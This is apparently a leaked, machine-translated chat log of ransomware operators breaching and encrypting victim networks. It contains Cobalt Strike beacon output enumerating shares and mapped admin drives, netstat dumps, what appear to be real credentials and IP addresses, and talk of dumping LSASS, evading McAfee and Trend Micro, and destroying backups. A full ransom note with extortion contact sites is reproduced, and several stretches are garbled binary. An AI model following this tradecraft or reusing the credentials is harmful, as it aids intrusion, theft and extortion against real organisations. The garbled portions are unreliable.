disconnect the policy and form did not find? at least one of the monitors stand you two next to each other will sit in the same window or what? ok@user7 help with AV and we will close only some policies are not available, i tried under different admins just unplug it? in the policies, there are a million of them found?look for disconnect but do not disable then all ok+ in other folders machine with the tag server144 in the folder servers100+ should clearly see how many servers there at least approximately or type of servera what filters do you need? look filters you went there or screenshots?[ ](https://mediaeveryone.com/group/crispregional-org?msg=zNs3B7SRGt4HC7Cu8) how many I do not see, but I see that a lot, most likely all
at least all servers and give me a shellcode are all pk's running there? no, i think all of them) here's a freshly built dll then + and there processes die in 30 sec? not all servers i checked, where i looked - they knock in it-admin, this server is macaffi cloud? and where they knock? yes everywhere is macaffi, just somewhere direct client and where some scanners check not through edr_q51B↩zeguya especially in the console av not looked into
no one has downloaded the dll, i will check if i have it everywhere, can't i download the build? interesting fact you threw in) by the way, the session dies after 30 seconds
freshly built dll
i'm not sure if all servers are av managed from konosli makaffi 20 mina should be reddish on the same sabinet? on the net how? on the dedik was a few komponu were yellow, became green) do not like it i think) WakeMeOnLan
I ran a fordcast on the deck, there were a few computers, they kinda woke up and what was the wol and how did you test?[ ](https://mediaeveryone.com/group/crispregional-org?msg=bvAFBp2D3sBPThK7z) I looked there) they're always ready
wol tested, it seems to work on rdpodgotovil WOL software, shredders, batniks, etc? user4user8user7user3 then work but there is nothing) there is an option edit cloud from the top left like a menu item look lagia unleashed10.1.20.183 MAIN\blove wingnut12#
206.221.188.106:52786 give me access and sostam what do we have? the first 3 items on the left look at the settings) now their computers are off
in bludhoudn two computers with active sessions YES, in addition to dkne, you need to reserver admin, well only
```
  TCP 0.0.0.0:6169 0.0.0.0:0 LISTENING 4676
and ``and also, the backup process does not always keep the connection open+and the pid is the same? on the pid, well it is not there, so it does not knock) there is no processa as you understood?
Active Connections

  Proto Local Address Foreign Address State PID
  TCP 0.0.0.0:111 0.0.0.0:0 LISTENING 2304
  TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 756
  TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
  TCP 0.0.0.0:1063 0.0.0.0:0 LISTENING 2304
  TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 1644
  TCP 0.0.0.0:2049 0.0.0.0:0 LISTENING 2304
  TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 3160
  TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
  TCP 0.0.0.0:6160 0.0.0.0:0 LISTENING 1900
  TCP 0.0.0.0:6161 0.0.0.0:0 LISTENING 2304
  TCP 0.0.0.0:6162 0.0.0.0:0 LISTENING 2352
  TCP 0.0.0.0:6169 0.0.0.0:0 LISTENING 4676
  TCP 0.0.0.0:6170 0.0.0.0:0 LISTENING 5300
  TCP 0.0.0.0:6172 0.0.0.0:0 LISTENING 4
  TCP 0.0.0.0:6190 0.0.0.0:0 LISTENING 2392
  TCP 0.0.0.0:6210 0.0.0.0:0 LISTENING 2176
  TCP 0.0.0.0:6290 0.0.0.0:0 LISTENING 2392
  TCP 0.0.0.0:8081 0.0.0.0:0 LISTENING 1232
  TCP 0.0.0.0:9380 0.0.0.0:0 LISTENING 1924
  TCP 0.0.0.0:9381 0.0.0.0:0 LISTENING 1924
  TCP 0.0.0.0:9392 0.0.0.0:0 LISTENING 3316
  TCP 0.0.0.0:9393 0.0.0.0:0 LISTENING 4276
  TCP 0.0.0.0:9396 0.0.0.0:0 LISTENING 3680
  TCP 0.0.0.0:9401 0.0.0.0:0 LISTENING 3316
  TCP 0.0.0.0:9501 0.0.0.0:0 LISTENING 3692
  TCP 0.0.0.0:10001 0.0.0.0:0 LISTENING 3316
  TCP 0.0.0.0:10002 0.0.0.0:0 LISTENING 3316
  TCP 0.0.0.0:10003 0.0.0.0:0 LISTENING 4676
  TCP 0.0.0.0:10005 0.0.0.0:0 LISTENING 3316
  TCP 0.0.0.0:10006 0.0.0.0:0 LISTENING 3316
  TCP 0.0.0.0:10050 0.0.0.0:0 LISTENING 1848
  TCP 0.0.0.0:11731 0.0.0.0:0 LISTENING 1900
  TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
  TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 540
  TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 864
  TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 888
  TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 640
  TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING 640
  TCP 0.0.0.0:49157 0.0.0.0:0 LISTENING 1036
  TCP 0.0.0.0:49203 0.0.0.0:0 LISTENING 632
  TCP 0.0.0.0:49204 0.0.0.0:0 LISTENING 3192
  TCP 10.1.20.183:139 0.0.0.0:0 LISTENING 4
  TCP 10.1.20.183:301 10.10.1.69:2049 ESTABLISHED 1900
  TCP 10.1.20.183:302 10.10.1.46:2049 ESTABLISHED 1900
  TCP 10.1.20.183:303 10.10.1.43:2049 ESTABLISHED 1900
  TCP 10.1.20.183:305 10.10.1.43:2049 ESTABLISHED 1900
  TCP 10.1.20.183:445 10.1.20.113:65195 ESTABLISHED 4
  TCP 10.1.20.183:3389 192.168.9.179:55814 ESTABLISHED 3160
  TCP 10.1.20.183:9392 10.1.20.183:60589 ESTABLISHED 3316
  TCP 10.1.20.183:9396 192.168.9.179:58127 ESTABLISHED 3680
  TCP 10.1.20.183:9396 192.168.9.179:58869 ESTABLISHED 3680
  TCP 10.1.20.183:10050 10.1.200.69:32768 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:32786 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:32880 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:32882 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:32972 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:33010 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:33036 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:33246 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:33266 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:33464 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:33764 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:33942 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:34178 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:34238 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:34372 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:34542 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:34682 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:34696 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:34866 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:35004 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:35090 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:35206 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:35294 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:49650 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:49782 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:49866 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50016 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50076 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50188 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50250 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50416 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50538 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50652 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50836 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50958 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:50970 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:51108 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:51270 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:51410 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:51518 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:51584 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:51706 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:51852 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52014 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52122 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52284 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52372 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52536 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52654 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52804 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52836 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52938 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:52996 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53002 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53094 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53118 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53192 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53374 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53384 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53482 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53592 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53744 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53858 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53944 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:53958 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:54060 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:54074 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:54118 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:54170 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:54262 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:54378 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:54532 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:54626 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:54988 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:55106 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:55296 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:55474 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:55610 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:55682 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:55780 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:55974 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:56038 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:56156 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:56262 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:56344 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:56504 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:56610 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:56716 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:56778 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:56912 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:57018 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:57162 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:57262 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:57396 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:57434 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:57606 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:57746 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:57820 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:57944 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:58116 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:58248 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:58334 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:58466 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:58594 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:58730 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:58848 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:58960 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:59064 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:59212 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:59308 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:59464 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:59572 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:59708 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:59814 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:59982 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:59994 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60046 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60096 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60178 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60190 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60282 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60368 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60442 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60560 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60656 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60794 TIME_WAIT 0
  TCP 10.1.20.183:10050 10.1.200.69:60894 TIME_WAIT 0
  TCP 10.1.20.183:51988 10.1.20.112:445 ESTABLISHED 4
  TCP 10.1.20.183:51990 10.1.20.112:445 ESTABLISHED 4
  TCP 10.1.20.183:60489 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60498 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60499 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60503 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60506 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60507 10.1.20.140:49669 TIME_WAIT 0
  TCP 10.1.20.183:60521 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60524 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60525 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60532 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60533 10.1.20.140:49669 TIME_WAIT 0
  TCP 10.1.20.183:60536 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60549 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60553 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60559 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60561 10.1.20.140:49669 TIME_WAIT 0
  TCP 10.1.20.183:60568 10.1.20.183:9501 TIME_WAIT 0
  TCP 10.1.20.183:60569 10.1.20.183:9501 TIME_WAIT 0
  TCP 10.1.20.183:60570 10.1.20.183:9501 TIME_WAIT 0
  TCP 10.1.20.183:60575 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60576 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60580 10.1.200.69:10051 TIME_WAIT 0
  TCP 10.1.20.183:60583 10.1.20.140:49669 ESTABLISHED 640
  TCP 10.1.20.183:60585 10.1.20.183:9392 TIME_WAIT 0
  TCP 10.1.20.183:60589 10.1.20.183:9392 ESTABLISHED 8780
  TCP 10.1.20.183:60598 173.234.155.15:443 LAST_ACK 2832
  TCP 10.1.20.183:60599 173.234.155.15:443 LAST_ACK 568
  TCP 127.0.0.1:1434 0.0.0.0:0 LISTENING 1644
  TCP 127.0.0.1:6290 127.0.0.1:49196 ESTABLISHED 2392
  TCP 127.0.0.1:49196 127.0.0.1:6290 ESTABLISHED 2352
  TCP [::]:135 [::]:0 LISTENING 756
  TCP [::]:445 [::]:0 LISTENING 4
  TCP [::]:1433 [::]:0 LISTENING 1644
  TCP [::]:3389 [::]:0 LISTENING 3160
  TCP [::]:5985 [::]:0 LISTENING 4
  TCP [::]:6160 [::]:0 LISTENING 1900
  TCP [::]:6161 [::]:0 LISTENING 2304
  TCP [::]:6162 [::]:0 LISTENING 2352
  TCP [::]:6172 [::]:0 LISTENING 4
  TCP [::]:6190 [::]:0 LISTENING 2392
  TCP [::]:6210 [::]:0 LISTENING 2176
  TCP [::]:8081 [::]:0 LISTENING 1232
  TCP [::]:10050 [::]:0 LISTENING 1848
  TCP [::]:11731 [::]:0 LISTENING 1900
  TCP [::]:47001 [::]:0 LISTENING 4
  TCP [::]:49152 [::]:0 LISTENING 540
  TCP [::]:49153 [::]:0 LISTENING 864
  TCP [::]:49154 [::]:0 LISTENING 888
  TCP [::]:49155 [::]:0 LISTENING 640
  TCP [::]:49156 [::]:0 LISTENING 640
  TCP [::]:49157 [::]:0 LISTENING 1036
  TCP [::]:49203 [::]:0 LISTENING 632
  TCP [::]:49204 [::]:0 LISTENING 3192
  TCP [::1]:1434 [::]:0 LISTENING 1644
  UDP 0.0.0.0:111 *:* 2304
  UDP 0.0.0.0:123 *:* 912
  UDP 0.0.0.0:500 *:* 888
  UDP 0.0.0.0:1063 *:* 2304
  UDP 0.0.0.0:2049 *:* 2304
  UDP 0.0.0.0:3389 *:* 3160
  UDP 0.0.0.0:4500 *:* 888
  UDP 0.0.0.0:5355 *:* 968
  UDP 0.0.0.0:8082 *:* 1232
  UDP 10.1.20.183:137 *:* 4
  UDP 10.1.20.183:138 *:* 4
  UDP 127.0.0.1:55150 *:*:640
  UDP 127.0.0.1:63057 *:* 888
  UDP 127.0.0.1:63060 *:* 968
  UDP 127.0.0.1:64301 *:* 1308
  UDP [::]:123 *:* 912
  UDP [:]:500 *:* 888
  UDP [:]:3389 *:*:3160
  UDP [:]:4500 *:*:888
  UDP [:]:8082 *:*:1232

``This process doesn't knock anywhere?
[-] screenshot from desktop 0 is empty
``empty Show me a screenshot of my desktop and jump to the processMicrosoft Windows Server 2012 R2 Standard What is os7) and cmd5 has no clears (then we will look at it together, i will jump there and take a dump.no, i went there a couple hours ago give me a screenshots of what you see there? local backups i see all my tasks, servers, etc. the cloud tab only has a plug in and something like find providers but not configured? but the software is yes, i checked it
there's no cloud configured is there a thing? veema backup and replicationhttps://www.veeam.com/cloud-connect-backup-service-providers.htmlпо rp probably a cloud backup did you go there? local use if this stuff connects anywhere there's a chance of a cloud backups no other sign of a cloud backups found look at netstat first it's very easy cloud backups
go to rdp under the admin from which the process is hovering and check if there is a cloud backup configured what settings did you want to find?[ ](https://mediaeveryone.com/group/crispregional-org?msg=GPomCCiWBYFagbv9w) not sure about that+ready?
https://niceadd.com
----------------------------------------------------------------------------------------
209.222.101.167:10918
uVTxvMXJAvo6Vxsuw6iFhfu6YtstdU9kKPV
I'll ping the pool from 2008
Mpaq123 /user:grouphc\linrcbatch
``Any domain? with creeds if 2008 falls under ms17? probably detects as a dump lsassfile deletes nothing writes? tried procdump just in .dmp? tried all kinds of minidumps and so on?
i don't know why mcafee is blocking ... it's not ready yet, hb has delayschetverg labswould like to get information and how is the recruiting going? where's the fresh blood?)) 5-6 pcs so i got into a few user cars for fuck you hashdump? first time i hear that mcafee creates such problems..o_only cut offmacafi) if yes - no way? any thoughts? if memory is protected? how to remove hashdump listen to okaysnom before sleep i'll be back today? i'll throw it off then hardly have time for another 30 minutes) aha? hello mini report on sonic?
Extracting DPAPI Backup Keys with Domain Admin

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++
``hi:space_invader::man_raising_hand:hello all)Till Mon, and you)have a good weekend on Mon by 5 on this one and all thenarms still puffing, most of the server alive and put it damaged as I understand it, because it was in the process 2-2.5 hours there was 1 file left it turns out the rest is all put? +server? went off (then wait for the file not everywhere reached zamaplyenyh yes, is there a note at least one armas? there are few alive, the ones that stretch - pulled and ran his hands ``.

beacon> shell net view \10.0.6.56
[*] Tasked beacon to run: net view \10.0.6.56
[+] host called home, sent: 51 bytes
[+] received output:
Shared resources at \10.0.6.56



Share name Type Used as Comment

-------------------------------------------------------------------------------
C Disk
D Disk
The command completed successfully.
So I should get to them but they are unattached and the processes are killed but I haven't got to them yet or what, but they are untouched
```
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
Disconnected N:        \10.0.6.40\c$ Microsoft Windows Network
Disconnected O: \10.0.2.120\c$ Microsoft Windows Network
Disconnected P:        \10.0.6.75\c$ Microsoft Windows Network
Disconnected Q:        \10.0.2.215\c$ Microsoft Windows Network
Disconnected R:        \10.0.6.77\c$ Microsoft Windows Network
Disconnected S:        \10.0.6.64\c$ Microsoft Windows Network
Disconnected T:        \10.0.6.121\c$ Microsoft Windows Network
Disconnected U:        \10.0.6.147$ Microsoft Windows Network
Disconnected V: \10.0.6.93\c$ Microsoft Windows Network
Disconnected W:        \10.0.1.178\c$ Microsoft Windows Network
Disconnected X:        \10.0.6.56\c$ Microsoft Windows Network
Disconnected Y:        \10.0.6.94\c$ Microsoft Windows Network
Disconnected Z:        \10.0.6.61\c$ Microsoft Windows Network
The command completed successfully.


beacon> shell dir N:
[*] Tasked beacon to run: dir N:
[+] host called home, sent: 37 bytes
[+] received output:
 Volume in drive N is OS
 Volume Serial Number is 22CF-C5F8

 Directory of N:\

05/11/2020 06:06 AM <DIR> Apps
10/16/2020 02:17 PM 550,254 dcagentInstaller.log
05/11/2020 06:57 AM <DIR> Dell
10/16/2020 02:19 PM <DIR> Downloads
05/11/2020 05:56 AM <DIR> Drivers
01/22/2021 01:05 AM <DIR> Intel
10/21/2020 02:54 AM <DIR> kworking
03/18/2019 11:52 PM <DIR> PerfLogs
10/16/2020 02:55 PM <DIR> Program Files
12/27/2020 02:04 PM <DIR> Program Files (x86)
10/16/2020 02:37 PM 4,722 SSDXFlashLog.zip
10/16/2020 02:45 PM <DIR> temp
10/16/2020 03:30 PM <DIR> Users
01/01/2021 01:02 AM <DIR> Windows
10/16/2020 02:55 PM <DIR> Windows10Upgrade
               2 File(s) 554,976 bytes
              13 Dir(s) 191,506,898,944 bytes fre
``arms check now
servers let's wait 1 file? servers and armas ok? they will not understand) by fax already) send a note to your pager * i have a note where is the note you have a note?
better. i have a screenshot of the noteaahhanyou or a screenshot of the note)0kekmb leave a note to check the quarantinebolshoy dosheshypeshy and everythingtoo trand fucks the brain[ ](https://mediaeveryone.com/group/skytechinc-com?msg=Gu57s6jDHiGaTvJB8) Because gladioluson there is also, but it fucks why i thought there mcafee)he = trand[ ](https://mediaeveryone.com/group/skytechinc-com?msg=A7TC4rqBYQh3EMyZe) everywhere he stands no notes on the contrary where the trend - there are notes theretrendmicro just say that even with macafee there are notes deleted only in one place? well on dc will see thenahehane they do not think) well what they will not get from quarantine? from gui?
no way to kill the process to disable the protection? the population where the backups were we wiped the files, or else there pussy would be another 9 hours delayed?
Backup servers are encrypted[ ](https://mediaeveryone.com/group/skytechinc-com?msg=Fjzerwjbmcbf9DWpF) the process goes up immediately, the service doesn't shut down they've been shut down before
```
E:\SKYNASSC Backup\ISO Images\Backup_Exec_2012_14.0_SP2_MultiPlatforms_Multilingual.zip.2of2.id-D630D304.[stopstorage@qq.com].java.HAWFH
``Network can't stop protection? There is no such function if it's not everywhereAdd to exceptionsThere is no trendMicro all windows ``SKY-TS02`` is also fine``SKY-TS01````
 Directory of C:\

01/29/2021 08:42 PM 1,558 .rnd.HAWFH
01/29/2021 08:42 PM <DIR> AdwCleaner
01/29/2021 08:42 PM <DIR> apps
01/29/2021 08:42 PM 536 ARCAOS.txt.HAWFH
01/29/2021 09:34 PM <DIR> Avantext
01/29/2021 08:43 PM <DIR> Avantext.old
12/25/2017 12:11 PM <DIR> CPPRO
08/21/2019 01:17 PM <DIR> inetpub
01/17/2018 02:12 AM <DIR> Klogs
06/17/2018 12:30 AM <DIR> Kmonitorsets
11/25/2020 04:42 PM <DIR> kworking
07/13/2009 10:20 PM <DIR> PerfLogs
12/07/2020 12:05 AM <DIR> Program Files
12/30/2020 07:47 AM <DIR> Program Files (x86)
01/29/2021 08:42 PM 930 readme.txt
01/29/2021 08:42 PM 551 reboot.cmd.HAWFH
12/24/2020 12:45 PM <DIR> symbols
11/02/2020 04:19 PM <DIR> TEMP
06/28/2019 03:18 PM <DIR> temp1
03/14/2017 03:27 PM <DIR> TFBO Reports
09/10/2019 07:42 AM <DIR> time keeper
01/26/2017 11:02 PM <DIR> txtav
01/17/2021 06:05 PM <DIR> Users
01/29/2021 07:13 PM <DIR> Windows
               4 File(s) 3,575 bytes
              20 Dir(s) 31,755,657,216 bytes free

beacon> shell type C:\readme.txt
[*] Tasked beacon to run: type C:\readme.txt
[+] host called home, sent: 49 bytes
[+] received output:
All of your files are currently encrypted.
Backups were encrypted or deleted, same as Shadow Copies.

If you try to use any additional recovery software - the files might be damaged, but if you are still willing to try - try it on the data of the lowest value.

To make sure that we REALLY CAN recover all of the encrypted data - we offer you to decrypt 2 random files of your choice completely free of charge.

The faster you reply - the easier and cheaper it will be.
To receive information on the price of the recovery software you can contact our team directly for further instructions through our website:

TOR VERSION :
(you should download and install TOR browser first https://torproject.org)

http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/

HTTPS VERSION :
https://contirecovery.best

---BEGIN ID---
dgbmGEAzby8w4AXUtdoh6nTEfuymihxXn0pmdmtDDT3cjOjMsdxvZahDXRDeotyd
---END ID---
``This one
```
DbNÀ`tñïÒf¬µ
<ñzÅ!ïË "ð3 à\bŽ¡ÕU/ÃZðÉ@^6 ¶ùÜhoÐMXw[+Ø'öf7ïÁÜ=ÓZ÷£B &ìÄ]sYVM©÷EÙÃ9þb>îòoɳ§ÇÂ(g "b"³j¡ø N#á
ýÐ*FíNßÊ¢ÓÈÏa±Zq(rDMk¹8}ÀÕ¥+ìÓ€aq±Sµ<õÖÏæ^&xÓaC9d1ðvëtaÙñ*Çñ¬n\ÉÝRmO-Øä!^_DTØùûûâ8éÅÁ ÀJ\n¬Ï)zž Ys Aõuêä ŒŽÓ%Æ7
3Ãœz")Iüç?Úu*%É|YRÇå×açÊ "5ìX¹Y7éÖÊZM~öâëÛŠ'Yΰ/+œ~/Ì/óð,gL8*{öd-5×M3œŒ "sdïì÷Uh_^ È Œ'Àa= ÁöŒJ#óÏï6[Dš¥ < |n$DäXýÚ¡Œu)f=Û "Aædª>º!xZ¹9'b "å9 $Š¢Ö[§õA7(üíxeñ9tXúߟ
¦[ ](https://mediaeveryone.com/group/skytechinc-com?msg=gB3DCv33bT2C3Ed6E) it's not clear, I'm looking somewhere, but it's crooked [ ](https://mediaeveryone.com/group/skytechinc-com?msg=gB3DCv33bT2C3Ed6E) maybe...on the rdp went to the desktop, it appeared on the desktop and almost immediately disappeared at the end when all encrypted?

ç%âHq:ðÒÒÒ""[§ºãs-0&oÍdq\¹îÏ]ÔI÷/øáQIÐŒU{@z®B1þÌÀ5µ1z{òÍÄÄ¥SŠ Œò|7àb œÁÁøÐ "f1Ç߶y¹7Õª81Ð,ö÷ÖÖÜåT÷kQÿi8Omã)óFºÚ¹_Èî.pò ßúùCZ=&
ÓÑ,E®¢ºã~þí-N|{É_¬ó%Ž}²r3,*0å<óTQPÜ(¢&ÿÇæþü76esL$qAV£-Ïô5ÑŒ,©G (â±ÍªM*Ä7ÖLK?ÞŠøvIÊ}¢4Õ$œ Ю°áØ*IàJ,Jam®!oÊkŸúOÔ!ÖÒR£'Šûº_(UÁHÜà /Wùùùðûê "qj,ê<× ØŒeö.nzg@!é
``There's a corp product that can be sewn in by defaultWhat's it got to do with it? https://www.mcafee.com/enterprise/en-us/downloads/free-tools/interceptor.htmlОпять
```
 *49128 632 TmListen.exe x64 0 NT AUTHORITY\SYSTEM
``It's the only one
```
 0 0 [System Process]
 4 0 System x64 0 NT AUTHORITY\SYSTEM
 356 4 smss.exe x64 0 NT AUTHORITY\SYSTEM
 480 472 csrss.exe x64 0 NT AUTHORITY\SYSTEM
 540 472 wininit.exe x64 0 NT AUTHORITY\SYSTEM
